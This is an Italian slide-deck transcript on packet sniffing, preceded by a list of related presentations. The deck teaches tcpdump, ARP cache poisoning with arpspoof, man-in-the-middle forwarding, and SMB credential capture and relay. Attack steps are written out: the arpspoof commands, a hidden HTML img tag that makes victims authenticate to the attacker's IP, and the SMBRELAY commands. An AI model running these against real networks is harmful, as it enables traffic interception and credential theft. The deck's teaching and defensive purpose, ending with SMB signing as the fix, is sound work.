Sniffing.

Slides:



Advertisements
Presentazioni simili
Prof. Carla Fanchin – L.S. Tron
Advertisements

Università degli Studi di Napoli "Federico II" - a.a. 2002/2003 Le TD nei processi di apprendimento: strategie di apprendimento collaborativo supportate.
LE RETI Modello OSI e TCP/IP LE RETI Modello OSI e TCP/IP Maura Zini.
Italo Losero S tray B ytes strane cose succedono nelle reti....
INTERNET : ARPA sviluppa ARPANET (rete di computer per scopi militari)
Corso di laurea in INFORMATICA
1 I KEYLOGGERS COSA SONO CONTROMISURE UN ESEMPIO.
IL NOSTRO LABORATORIO. Di INFORMATICA.. Presentazione: Nel nostro laboratorio abbiamo 24 postazioni con dei computer di tipo Desktop con queste caratteristiche:
IL NOSTRO LABORATORIO Di INFORMATICA. Nel nostro laboratorio abbiamo 24 postazioni con dei computer di tipo Desktop con queste caratteristiche: Sistema.
Di INFORMATICA IL NOSTRO LABORATORIO. Presentazione Nel nostro laboratorio abbiamo 24 postazioni con dei computer di tipo Desktop con queste caratteristiche:
IL NOSTRO LABORATORIO. Di INFORMATICA..
IL NOSTRO LABORATORIO. Di INFORMATICA.. Presentazione: Nel nostro laboratorio abbiamo 24 postazioni con dei computer di tipo Desktop con queste caratteristiche:
IL NOSTRO LABORATORIO Di INFORMATICA. Presentazione Nel nostro laboratorio abbiamo 24 postazioni con dei computer di tipo Desktop con queste caratteristiche:
IL NOSTRO LABORATORIO Di INFORMATICA. Presentazione Nel nostro laboratorio abbiamo 24 postazioni con dei computer di tipo Desktop con queste caratteristiche:
IL NOSTRO LABORATORIO Di INFORMATICA. Presentazione Nel nostro laboratorio abbiamo 24 postazioni con dei computer di tipo Desktop con queste caratteristiche:
IL NOSTRO LABORATORIO Di INFORMATICA. Presentazione Nel nostro laboratorio abbiamo 24 postazioni con dei computer di tipo Desktop con queste caratteristiche:
Laurea Triennale in Infermieristica
Secure Shell Giulia Carboni
Architettura del World Wide Web
Posta elettronica ( ) chiocciola" comunemente letta at Identificativo dellutente Identificativo del computer centrale sul quale risiede.
IDUL 2010 RETI E PROTOCOLLI. INTERNET.. IDEE PRINCIPALI IN QUESTA LEZIONE Reti: Aspetto logico della rete e tipologie: peer-to-peer, a hub, a bus Trasmissione.
Corso di Informatica Corso di Laurea in Conservazione e Restauro dei Beni Culturali Gianluca Torta Dipartimento di Informatica Tel: Mail:
Struttura dei sistemi operativi (panoramica)
CORSO DI INFORMATICA LAUREA TRIENNALE-COMUNICAZIONE & DAMS
Corso di Sicurezza su Reti II
Progetto Sicurezza 2 Fase di setup Prof. A. De Santis
RETI E INTERNET.
Facoltà di Economia, Università di Roma
AICA Corso IT Administrator: modulo 5 AICA © EUCIP IT Administrator Modulo 5 - Sicurezza Informatica Esercitazione Alberto Bosio.
Concetti introduttivi
4 Cosa è una rete? ã Punto di vista logico: sistema di dati ed utenti distribuito ã Punto di vista fisico: insieme di hardware, collegamenti, e protocolli.
Corso di PHP.
1 Seminario di Sicurezza Attacchi Remoti Elisabetta Parodi.
Corso di Informatica per Giurisprudenza Lezione 7
Modulo 7 – reti informatiche u.d. 2 (syllabus – )
Usare la posta elettronica con il browser web
Guida IIS 6 A cura di Nicola Del Re.
Test Reti Informatiche A cura di Gaetano Vergara Se clicchi sulla risposta GIUSTA passi alla domanda successiva Se clicchi sulla risposta ERRATA passi.
La rete di istituto Maninder Bansal 5Bz Vital Ivo 5Bz Anno scolastico 2005/06.
Server Web in una rete Windows Sommario Meccanismi di accesso remoto Meccanismi di accesso remoto Introduzione ai Server Web Introduzione ai Server.
Configurazione in ambiente Windows Ing. A. Stile – Ing. L. Marchesano – 1/23.
AICA Corso IT Administrator: modulo 4 AICA © EUCIP IT Administrator Modulo 4 - Uso Esperto della Rete Risoluzione dei Problemi e Analisi del Traffico.
1 Ripassino Reti di Computer Carasco 19/02/ Che cosa è una rete informatica? Una rete informatica è un insieme di computer connessi tra di loro.
Sicurezza Informatica. Conoscere ed evitare! 2/19 I Virus e le truffe informatiche.
Modulo 2 - U.D. 3 - L.4 Ernesto Damiani - Sistemi di eleborazione dell'informazione.
BIOINFO3 - Lezione 111 CGI-BIN CGI-BIN sono chiamati i programmi la cui esecuzione può essere richiesta attraverso il WEB. Il server web (httpd) della.
Amministrazione della rete: web server Apache
ASP – Active Server Pages - 1 -Giuseppe De Pietro Introduzione ASP, acronimo di Active Server Pages, sta ad indicare una tecnologia per lo sviluppo di.
Informatica Lezione 9 Scienze e tecniche psicologiche dello sviluppo e dell'educazione (laurea triennale) Anno accademico:
Corso di Laurea in Conservazione e Restauro dei Beni Culturali
L’architettura a strati
Internet: una panoramica
prof.ssa Giulia Quaglino
FTP File Transfer Protocol
Creato da Riccardo Nuzzone
Realizzazione Sito Web
Greco Rodolfo 2002 Application Trasport Network Phisic HTTP IP UDPTCP DNS SNAP MAC ARP L’utente fa una richiesta di pagina.
1 Storia di Internet Internet non è un’invenzione degli anni ’90….. Nata dagli studi di un’agenzia detta ARPA (Advanced Research Projects Agency) Internet.
Tipi e topologie di LAN Lezione 2.
1 Informatica Generale Alessandra Di Pierro Ricevimento: Giovedì ore presso Dipartimento di Informatica, Via Buonarroti,
Reti di computer Condivisione di risorse e
Livello 3 Network (Rete)
INTRODUZIONE A INTERNET
Sistemi operativi di rete Ing. A. Stile – Ing. L. Marchesano – 1/18.
1 Ethereal. 2 I protocolli di rete Per meglio comprendere i protocolli di rete, è molto utile vederli “in azione”, osservando la sequenza dei messaggi.
CORSO INTERNET la Posta elettronica
Informatica Lezione 8 Psicologia dello sviluppo e dell'educazione (laurea magistrale) Anno accademico:
31 ottobre Security Assessment per Cassa Centrale Analisi delle modalità di deployment di server e di postazioni utente. Simulazione di consulente.
Applicazione Presentazione Sessione Trasporto Rete Data link Fisico OSI Processo / Applicazione Trasporto Rete- Internet Interfaccia di.
Raccogliere informazioni ALCUNE DOMANDE FONDAMENTALI È stato modificato qualche componente HW o SW? Il sintomo si presenta regolarmente o ad intermittenza?
Transcript della presentazione:

Sniffing

Sniffer Un packet sniffer è un dispositivo di intercettazione che si connette a reti di computer ed "origlia" sul traffico di rete. Un programma di "sniffing" permette a qualcuno di ascoltare delle conversazioni tra computers. Perciò, i programmi di intercettazione di rete vengono forniti con una funzionalità nota come "analisi di protocollo", che gli permette di "decodificare" il traffico fra computer e di dargli un senso. Lo sniffing ha un vantaggio rispetto all'intercettazione telefonica: diverse reti utilizzano un "supporto condiviso".

Sniffer ethernet Uno Sniffer Ethernet è un programma in grado di “ascoltare” tutto il traffico che attraversa un dispositivo di rete piuttosto che intercettare solo quello indirizzato ad essa. Per consentire questa funzionalità il dispositivo di rete deve essere impostato in modalità promiscua.

Ethernet Ethernet è stata costruita su un principio di "condivisione": tutte le macchine sulla stessa rete, condividono lo stesso cavo. Questo comporta che tutte le macchine sono in grado di "vedere" tutto il traffico. Così, l'hardware Ethernet viene costruito con un "filtro" che ignora tutto il traffico che non gli appartiene. Fa questo ignorando tutti i frames contenenti indirizzo MAC non corrispondenti al proprio. Un programma di intercettazione disattiva questo filtro, ponendo l'hardware Ethernet in "modalità promiscua". Così Marco potrà vedere tutto il traffico tra Alice e Roberto, finchè saranno tutti sullo stesso cavo Ethernet.

Applicazioni Gli usi tipici di questi programmi di intercettazione includono: Analisi automatica della rete alla ricerca di passwords e nomi utente in chiaro: questo è un uso comune per gli hackers/crackers per consentirgli di accedere ai sistemi; Conversione dei dati in un formato umanamente leggibile: così che le persone possano leggere il traffico; Analisi delle anomalie: per scoprire eventuali problemi all'interno delle reti, come ad esempio, perchè il computer A non può comunicare con il computer B; Analisi delle prestazioni: per scoprire i colli di bottiglia nelle reti; Rilevazione delle intrusioni di rete: così da rilevare hackers/crackers (vedere http://www.robertgraham.com/pubs/network-intrusion-detection.html); Registrazione del traffico di rete: per creare registri a cui gli hackers non possano accedere e quindi cancellare.

Servizi vulnerabili Telnet e rlogin La cattura dei pacchetti permette di avere i tasti che l'utente preme man mano che questi vengono HTTP La versione di default di HTTP ha numerosi bachi. Diversi siti web utilizzano il metodo di autenticazione "Basic", che invia le password sul cavo in chiaro. Altri siti web utilizzano un'altra tecnica, richiedendo all'utente un nome utente ed una password, ma anche in questo caso i dati vengono inviati in rete in chiaro. SNMP Praticamente tutto il traffico SNMP è di tipo SNMPv1, il che non presenta un buon livello di sicurezza. Le password SNMP (chiamate stringa di comunità) vengono inviate sul cavo in chiaro. NNTP Password inviate in chiaro. Dati inviati in chiaro. POP Password inviate in chiaro. Dati inviati in chiaro. FTP Password inviate in chiaro. Dati inviati in chiaro. IMAP Password inviate in chiaro. Dati inviati in chiaro.

Applicativi sniffer Gli strumenti software utilizzati per eseguire Packet Sniffing sono detti “Sniffer”. Tcpdump Ethereal (grafico, ma esiste la versione testuale Tethereal) Dsniff Snort Sniffit

Hub e switch Per “sniffare” pacchetti occorre, fondamentalmente far funzionare lo Sniffer su una rete LAN connessa con un HUB e non con uno SWITCH. In una rete “hubbed” di n pc (A, B, C, …), se F vuole comunicare con C, i dati passano attraverso l’HUB.

Lo switch Uno SWITCH “conosce” sia quali sono i pc connessi, sia dove sono.

Ingannare lo switch Ciò rende più impegnativa l’attività di Packet Sniffing… MA NON IMPOSSIBILE!!!

Esempio tcpdump [ -adeflnNOpqRStuvxX ] [ -c count ] [ -C file_size ] [ -F file ] [ -i interface ] [ -m module ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ -E algo:secret ] [ expression ] Tcpdump stampa a video l’header dei pacchetti in transito su una LAN che corrispondono alle caratteristiche indicate in expression.

Tcpdump: expressions Con le expression si definiscono i criteri qualitativi coi quali scegliere i pacchetti da visualizzare. Le expression consistono in una o più primitive precedute da “qualificatori”. I qualificatori sono: type, dir e proto.

Tcpdump qualificatori Type: host, net e port Es. ‘host 155.185.54.156’, ‘port 22’, ecc. Dir: src, dst, src or dst Es. ‘src 155.185.54.156’ Proto: ether, fddi, tr, ip, ip6, arp, rarp, decnet, tcp and udp Es. ‘tcp port 21‘, ‘arp net 155.185.54’

Esempi di pacchetti cabernet:/home/bulgaro# tcpdump 'port 22' 16:30:08.161783 cabernet.ing.unimo.it.40526 > twist.ing.unimo.it.ssh: S 1415445902:1415445902(0) win 5840 <mss 1460,sackOK,timestamp 20984976 0,nop,wscale 0> (DF) 16:30:08.161917 twist.ing.unimo.it.ssh > cabernet.ing.unimo.it.40526: S 1970918816:1970918816(0) ack 1415445903 win 5792 <mss 1460,sackOK,timestamp 34225219 20984976,nop,wscale 0> (DF) 16:30:08.161948 cabernet.ing.unimo.it.40526 > twist.ing.unimo.it.ssh: . ack 1 win 5840 <nop,nop,timestamp 20984976 34225219> (DF)

Attaccare una comunicazione Consideriamo tre macchine (A, B, C) collegate mediante uno switch Usiamo tcpdump per monitorare il traffico Se A e B stanno dialogando cosa vediamo sulla tre macchine ?????

Il protocollo ARP All’avvio A e B dovranno scambiarsi dei messaggi che permettano di associare i loro indirizzi IP a quelli fisici Ethernet La terza macchina vedrà l’unico pacchetto: 16:38:36.501274 arp who-has 192.168.1.3 tell 192.168.1.1 La risposta verrà inviata da 192.168.1.3 a 192.148.1.1: 16:38:36.509581 arp reply 192.168.1.3 is at 08:00:20:77:4d:db

Il protocollo ARP È possibile ingannare il richiedente ? Le tabelle ARP sono dinamiche …. Il comando arp –a permette di visualizzare la cache ARP

Corrompere la cache ARP Arpspoof: Usage: arpspoof [-i interface] [-t target] host Il host è la macchina che riceve i pacchetti che vogliamo intercettare Il target è la macchina che vogliamo ingannare corrompendo la cache ARP

Corrompere la cache ARP Per ottenere intergettare una intera comunicazione bilaterale occorre lanciare due volte il programma: #./arpspoof –i eth0 –t 192.168.1.1 192.168.1.3 #./arpspoof –i eth0 –t 192.168.1.3 192.168.1.1

Completare l’opera Affinché i pacchetti ritornino poi al corretto destinatario occorre che la macchina C li forwardi verso la corretta destinazione: #echo 1 > /proc/sys/net/ipv4/ip_forward

MITM MITM: Man in the Middle È una tipologia di attacco Nell’esempio precedente ci siamo inseriti in un comunicazione Potremmo modificare i pacchetti ….. Vediamo come sfruttare la situazione….

Attuare un attacco MITM Un sistema windows quando cerca di accedere ad una cartella remota si presenta con login ed hash della password usata dall’utente connesso alla macchina locale Mettendosi nel mezzo si può intercettare la password Per crackarla ….. Ma non solo

SMB di windows Il protocollo SMB di windows serve ad accedere a file remoti Il server è attivo sulle porte TCP 139 e TCP 445 Un semplice collegamento in un pagina html forza la vittima ad accedere alla nostra macchina presentando le proprie credenziali (cifrate): <img src=file://10.0.0.1/null.gif height=1 width=1></img>

Un programma utile !? SMBRELAY può essere utilizzato per catturare queste informazioni Occorre: Disabilitare i listeners di window …. Lanciare SMBRELAY SMBRELAY /E //visualizza le interfacce SMBRELAY /IR 10006 /IL 10006 /T 10.0.0.10 /R 10.0.0.50

Il relay Sia 10.11.22.33 la macchina con SMBRELAY in esecuzione (la nostra attacente 1) Sia 10.0.0.50 un secondo indirizzo IP che diamo all’interfaccia 10006 della nostra macchina Sia 10.0.0.10 la nostra vittima Forziamo in qualche modo la vittima a collegarsi a 10.11.22.33 (es. la pag html)

Attuare l’attacco SMBRELAY memorizza le credenziali della vittima quando questa cerca di accedere Interompe la sessione e ne apre una nuova verso la vittima ripresentando le stesse credenziali SMBRELAY effettuerà il relay di qualunque richiesta inviata a 10.0.0.50 alla macchina vittima insieme alle sue stesse credenziali Accedendo ad un cartella condivisa: \\10.0.0.50\docs in realtà la nostra richiesta viene fatta rimbalzare su 10.0.0.1 con le credenziali corrette

Come difendersi Esiste da tempo un servizio SMB signing È possibile attivarlo agendo sul registro già in NT Server ed NT workstation (SP3) Esso annulla la possibilità di usare SMBRELAY